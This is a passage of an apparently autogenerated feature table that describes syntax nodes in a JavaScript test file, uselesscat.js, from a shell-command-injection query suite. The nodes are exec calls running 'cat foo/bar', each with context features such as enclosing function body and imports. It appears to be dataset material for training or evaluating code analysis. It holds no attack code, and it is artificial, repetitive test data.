contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:55:121:57 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:55:121:57 | log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:55:121:57 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:59:121:61 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:11 | notDead | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:11 | notDead | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:11 | notDead | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:67 | notDead | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:67 | notDead | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:67 | notDead | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:67 | notDead ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:67 | notDead ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:5:123:67 | notDead ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:18 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:18 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:18 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exceptional return of exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exceptional return of exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exceptional return of exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:20:123:32 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:20:123:32 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:20:123:32 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:20:123:32 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:20:123:32 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:20:123:32 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | (err, o ... g(out)} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | (err, o ... g(out)} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:35:123:66 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:36:123:38 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:36:123:38 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:36:123:38 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:36:123:38 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:36:123:38 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:41:123:43 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:56 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:56 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:56 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:56 | console | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:56 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:60 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:60 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:60 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:60 | console.log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:60 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | exceptional return of console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:58:123:60 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:58:123:60 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:58:123:60 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:58:123:60 | log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:58:123:60 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:62:123:64 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:7 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:7 | console | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:7 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:11 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:11 | console.log | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:11 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | console.log(notDead) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | console.log(notDead) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | console.log(notDead) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | exceptional return of console.log(notDead) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | exceptional return of console.log(notDead) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | exceptional return of console.log(notDead) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:9:124:11 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:9:124:11 | log | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:9:124:11 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:13:124:19 | notDead | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:13:124:19 | notDead | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:13:124:19 | notDead | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:13:124:19 | notDead | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:13:124:19 | notDead | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:13:124:19 | notDead | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:2 | (functi ... ess.\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:2 | (functi ... ess.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:2 | (functi ... ess.\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:4 | (functi ... s.\\n})() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:4 | (functi ... s.\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:4 | (functi ... s.\\n})() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:4 | exceptional return of (functi ... s.\\n})() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:4 | exceptional return of (functi ... s.\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:1:134:4 | exceptional return of (functi ... s.\\n})() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | exec | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | this | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:126:1 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | 'arguments' object of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | exceptional return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | functio ... cess.\\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | functio ... cess.\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | functio ... cess.\\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:126:2:134:1 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:10 | dead | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:10 | dead | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:10 | dead | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:10 | dead | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:10 | dead | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:66 | dead = ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:66 | dead = ... (out)}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:66 | dead = ... (out)}) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:66 | dead = ... (out)}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:7:127:66 | dead = ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:17 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:17 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:17 | exec | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:17 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:17 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exceptional return of exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exceptional return of exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exceptional return of exec("c ... (out)}) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exceptional return of exec("c ... (out)}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exceptional return of exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exec("c ... (out)}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exec("c ... (out)}) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out 